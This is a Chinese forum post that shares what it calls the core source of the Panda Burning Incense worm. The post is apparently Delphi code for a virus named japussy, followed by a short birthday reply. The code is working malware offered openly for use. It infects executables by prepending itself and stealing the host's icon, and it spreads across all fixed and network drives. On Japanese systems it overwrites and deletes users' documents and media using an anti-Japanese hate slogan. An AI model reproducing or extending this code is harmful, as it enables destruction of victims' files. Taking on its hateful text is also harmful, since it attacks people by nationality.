★熊猫烧香★的核心代码!!!
program japussy; <BR>uses <BR>windows, sysutils, classes, graphics, shellapi{, registry}; <BR>const <BR>headersize = 82432; //病毒体的大小 <BR>iconoffset = $12eb8; //pe文件主图标的偏移量 <BR><BR>//在我的delphi5 sp1上面编译得到的大小,其它版本的delphi可能不同 <BR>//查找2800000020的十六进制字符串可以找到主图标的偏移量 <BR><BR>{ <BR>headersize = 38912; //upx压缩过病毒体的大小 <BR>iconoffset = $92bc; //upx压缩过pe文件主图标的偏移量 <BR><BR>//upx 1.24w 用法: upx -9 --8086 japussy.exe <BR>} <BR>iconsize = $2e8; //pe文件主图标的大小--744字节 <BR>icontail = iconoffset + iconsize; //pe文件主图标的尾部 <BR>id = $44444444; //感染标记 <BR><BR>//垃圾码,以备写入 <BR>catchword = 'if a race need to be killed out, it must be yamato. ' + <BR>'if a country need to be destroyed, it must be japan! ' + <BR>'*** w32.japussy.worm.a ***'; <BR>{$r *.res} <BR>function registerserviceprocess(dwprocessid, dwtype: integer): integer; <BR>stdcall; external 'kernel32.dll'; //函数声明 <BR>var <BR>tmpfile: string; <BR>si: startupinfo; <BR>pi: process_information; <BR>isjap: boolean = false; //日文操作系统标记 <BR>{ 判断是否为win9x } <BR>function iswin9x: boolean; <BR>var <BR>ver: tosversioninfo; <BR>begin <BR>result := false; <BR>ver.dwosversioninfosize := sizeof(tosversioninfo); <BR>if not getversionex(ver) then <BR>exit; <BR>if (ver.dwplatformid = ver_platform_win32_windows) then //win9x <BR>result := true; <BR>end; <BR>{ 在流之间复制 } <BR>procedure copystream(src: tstream; sstartpos: integer; dst: tstream; <BR>dstartpos: integer; count: integer); <BR>var <BR>scurpos, dcurpos: integer; <BR>begin <BR>scurpos := src.position; <BR>dcurpos := dst.position; <BR>src.seek(sstartpos, 0); <BR>dst.seek(dstartpos, 0); <BR>dst.copyfrom(src, count); <BR>src.seek(scurpos, 0); <BR>dst.seek(dcurpos, 0); <BR>end; <BR>{ 将宿主文件从已感染的pe文件中分离出来,以备使用 } <BR>procedure extractfile(filename: string); <BR>var <BR>sstream, dstream: tfilestream; <BR>begin <BR>try <BR>sstream := tfilestream.create(paramstr(0), fmopenread or fmsharedenynone); <BR>try <BR>dstream := tfilestream.create(filename, fmcreate); <BR>try <BR>sstream.seek(headersize, 0); //跳过头部的病毒部分 <BR>dstream.copyfrom(sstream, sstream.size - headersize); <BR>finally <BR>dstream.free; <BR>end; <BR>finally <BR>sstream.free; <BR>end; <BR>except <BR>end; <BR>end; <BR>{ 填充startupinfo结构 } <BR>procedure fillstartupinfo(var si: startupinfo; state: word); <BR>begin <BR>si.cb := sizeof(si); <BR>si.lpreserved := nil; <BR>si.lpdesktop := nil; <BR>si.lptitle := nil; <BR>si.dwflags := startf_useshowwindow; <BR>si.wshowwindow := state; <BR>si.cbreserved2 := 0; <BR>si.lpreserved2 := nil; <BR>end; <BR>{ 发带毒邮件 } <BR>procedure sendmail; <BR>begin <BR>//哪位仁兄愿意完成之? <BR>end; <BR>{ 感染pe文件 } <BR>procedure infectonefile(filename: string); <BR>var <BR>hdrstream, srcstream: tfilestream; <BR>icostream, dststream: tmemorystream; <BR>iid: longint; <BR>aicon: ticon; <BR>infected, ispe: boolean; <BR>i: integer; <BR>buf: array of char; <BR>begin <BR>try //出错则文件正在被使用,退出 <BR>if comparetext(filename, 'japussy.exe') = 0 then //是自己则不感染 <BR>exit; <BR>infected := false; <BR>ispe := false; <BR>srcstream := tfilestream.create(filename, fmopenread); <BR>try <BR>for i := 0 to $108 do //检查pe文件头 <BR>begin <BR>srcstream.seek(i, sofrombeginning); <BR>srcstream.read(buf, 2); <BR>if (buf = #80) and (buf = #69) then //pe标记 <BR>begin <BR>ispe := true; //是pe文件 <BR>break; <BR>end; <BR>end; <BR>srcstream.seek(-4, sofromend); //检查感染标记 <BR>srcstream.read(iid, 4); <BR>if (iid = id) or (srcstream.size < 10240) then //太小的文件不感染 <BR>infected := true; <BR>finally <BR>srcstream.free; <BR>end; <BR>if infected or (not ispe) then //如果感染过了或不是pe文件则退出 <BR>exit; <BR>icostream := tmemorystream.create; <BR>dststream := tmemorystream.create; <BR>try <BR>aicon := ticon.create; <BR>try <BR>//得到被感染文件的主图标(744字节),存入流 <BR>aicon.releasehandle; <BR>aicon.handle := extracticon(hinstance, pchar(filename), 0); <BR>aicon.savetostream(icostream); <BR>finally <BR>aicon.free; <BR>end; <BR>srcstream := tfilestream.create(filename, fmopenread); <BR>//头文件 <BR>hdrstream := tfilestream.create(paramstr(0), fmopenread or fmsharedenynone); <BR>try <BR>//写入病毒体主图标之前的数据 <BR>copystream(hdrstream, 0, dststream, 0, iconoffset); <BR>//写入目前程序的主图标 <BR>copystream(icostream, 22, dststream, iconoffset, iconsize); <BR>//写入病毒体主图标到病毒体尾部之间的数据 <BR>copystream(hdrstream, icontail, dststream, icontail, headersize - icontail); <BR>//写入宿主程序 <BR>copystream(srcstream, 0, dststream, headersize, srcstream.size); <BR>//写入已感染的标记 <BR>dststream.seek(0, 2); <BR>iid := $44444444; <BR>dststream.write(iid, 4); <BR>finally <BR>hdrstream.free; <BR>end; <BR>finally <BR>srcstream.free; <BR>icostream.free; <BR>dststream.savetofile(filename); //替换宿主文件 <BR>dststream.free; <BR>end; <BR>except; <BR>end; <BR>end; <BR>{ 将目标文件写入垃圾码后删除 } <BR>procedure smashfile(filename: string); <BR>var <BR>filehandle: integer; <BR>i, size, mass, max, len: integer; <BR>begin <BR>try <BR>setfileattributes(pchar(filename), 0); //去掉只读属性 <BR>filehandle := fileopen(filename, fmopenwrite); //打开文件 <BR>try <BR>size := getfilesize(filehandle, nil); //文件大小 <BR>i := 0; <BR>randomize; <BR>max := random(15); //写入垃圾码的随机次数 <BR>if max < 5 then <BR>max := 5; <BR>mass := size div max; //每个间隔块的大小 <BR>len := length(catchword); <BR>while i < max do <BR>begin <BR>fileseek(filehandle, i * mass, 0); //定位 <BR>//写入垃圾码,将文件彻底破坏掉 <BR>filewrite(filehandle, catchword, len); <BR>inc(i); <BR>end; <BR>finally <BR>fileclose(filehandle); //关闭文件 <BR>end; <BR>deletefile(pchar(filename)); //删除之 <BR>except <BR>end; <BR>end; <BR>{ 获得可写的驱动器列表 } <BR>function getdrives: string; <BR>var <BR>disktype: word; <BR>d: char; <BR>str: string; <BR>i: integer; <BR>begin <BR>for i := 0 to 25 do //遍历26个字母 <BR>begin <BR>d := chr(i + 65); <BR>str := d + ':\'; <BR>disktype := getdrivetype(pchar(str)); <BR>//得到本地磁盘和网络盘 <BR>if (disktype = drive_fixed) or (disktype = drive_remote) then <BR>result := result + d; <BR>end; <BR>end; <BR>{ 遍历目录,感染和摧毁文件 } <BR>procedure loopfiles(path, mask: string); <BR>var <BR>i, count: integer; <BR>fn, ext: string; <BR>subdir: tstrings; <BR>searchrec: tsearchrec; <BR>msg: tmsg; <BR>function isvaliddir(searchrec: tsearchrec): integer; <BR>begin <BR>if (searchrec.attr <> 16) and (searchrec.name <> '.') and <BR>(searchrec.name <> '..') then <BR>result := 0 //不是目录 <BR>else if (searchrec.attr = 16) and (searchrec.name <> '.') and <BR>(searchrec.name <> '..') then <BR>result := 1 //不是根目录 <BR>else result := 2; //是根目录 <BR>end; <BR>begin <BR>if (findfirst(path + mask, faanyfile, searchrec) = 0) then <BR>begin <BR>repeat <BR>peekmessage(msg, 0, 0, 0, pm_remove); //调整消息队列,避免引起怀疑 <BR>if isvaliddir(searchrec) = 0 then <BR>begin <BR>fn := path + searchrec.name; <BR>ext := uppercase(extractfileext(fn)); <BR>if (ext = '.exe') or (ext = '.scr') then <BR>begin <BR>infectonefile(fn); //感染可执行文件 <BR>end <BR>else if (ext = '.htm') or (ext = '.html') or (ext = '.asp') then <BR>begin <BR>//感染html和asp文件,将base64编码后的病毒写入 <BR>//感染浏览此网页的所有用户 <BR>//哪位大兄弟愿意完成之? <BR>end <BR>else if ext = '.wab' then //outlook地址簿文件 <BR>begin <BR>//获取outlook邮件地址 <BR>end <BR>else if ext = '.adc' then //foxmail地址自动完成文件 <BR>begin <BR>//获取foxmail邮件地址 <BR>end <BR>else if ext = 'ind' then //foxmail地址簿文件 <BR>begin <BR>//获取foxmail邮件地址 <BR>end <BR>else <BR>begin <BR>if isjap then //是倭文操作系统 <BR>begin <BR>if (ext = '.doc') or (ext = '.xls') or (ext = '.mdb') or <BR>(ext = '.mp3') or (ext = '.rm') or (ext = '.ra') or <BR>(ext = '.wma') or (ext = '.zip') or (ext = '.rar') or <BR>(ext = '.mpeg') or (ext = '.asf') or (ext = '.jpg') or <BR>(ext = '.jpeg') or (ext = '.gif') or (ext = '.swf') or <BR>(ext = '.pdf') or (ext = '.chm') or (ext = '.avi') then <BR>smashfile(fn); //摧毁文件 <BR>end; <BR>end; <BR>end; <BR>//感染或删除一个文件后睡眠200毫秒,避免cpu占用率过高引起怀疑 <BR>sleep(200); <BR>until (findnext(searchrec) <> 0); <BR>end; <BR>findclose(searchrec); <BR>subdir := tstringlist.create; <BR>if (findfirst(path + '*.*', fadirectory, searchrec) = 0) then <BR>begin <BR>repeat <BR>if isvaliddir(searchrec) = 1 then <BR>subdir.add(searchrec.name); <BR>until (findnext(searchrec) <> 0); <BR>end; <BR>findclose(searchrec); <BR>count := subdir.count - 1; <BR>for i := 0 to count do <BR>loopfiles(path + subdir.strings + '\', mask); <BR>freeandnil(subdir); <BR>end; <BR>{ 遍历磁盘上所有的文件 } <BR>procedure infectfiles; <BR>var <BR>driverlist: string; <BR>i, len: integer; <BR>begin <BR>if getacp = 932 then //日文操作系统 <BR>isjap := true; //去死吧! <BR>driverlist := getdrives; //得到可写的磁盘列表 <BR>len := length(driverlist); <BR>while true do //死循环 <BR>begin <BR>for i := len downto 1 do //遍历每个磁盘驱动器 <BR>loopfiles(driverlist + ':\', '*.*'); //感染之 <BR>sendmail; //发带毒邮件 <BR>sleep(1000 * 60 * 5); //睡眠5分钟 <BR>end; <BR>end; <BR>{ 主程序开始 } <BR>begin <BR>if iswin9x then //是win9x <BR>registerserviceprocess(getcurrentprocessid, 1) //注册为服务进程 <BR>else //winnt <BR>begin <BR>//远程线程映射到explorer进程 <BR>//哪位兄台愿意完成之? <BR>end; <BR>//如果是原始病毒体自己 <BR>if comparetext(extractfilename(paramstr(0)), 'japussy.exe') = 0 then <BR>infectfiles //感染和发邮件 <BR>else //已寄生于宿主程序上了,开始工作 <BR>begin <BR>tmpfile := paramstr(0); //创建临时文件 <BR>delete(tmpfile, length(tmpfile) - 4, 4); <BR>tmpfile := tmpfile + #32 + '.exe'; //真正的宿主文件,多一个空格 <BR>extractfile(tmpfile); //分离之 <BR>fillstartupinfo(si, sw_showdefault); <BR>createprocess(pchar(tmpfile), pchar(tmpfile), nil, nil, true, <BR>0, nil, '.', si, pi); //创建新进程运行之 <BR>infectfiles; //感染和发邮件 <BR>end; <BR>end.<BR><BR>re:★熊猫烧香★的核心代码!!!
海哥,祝你生日快乐!
页:
[1]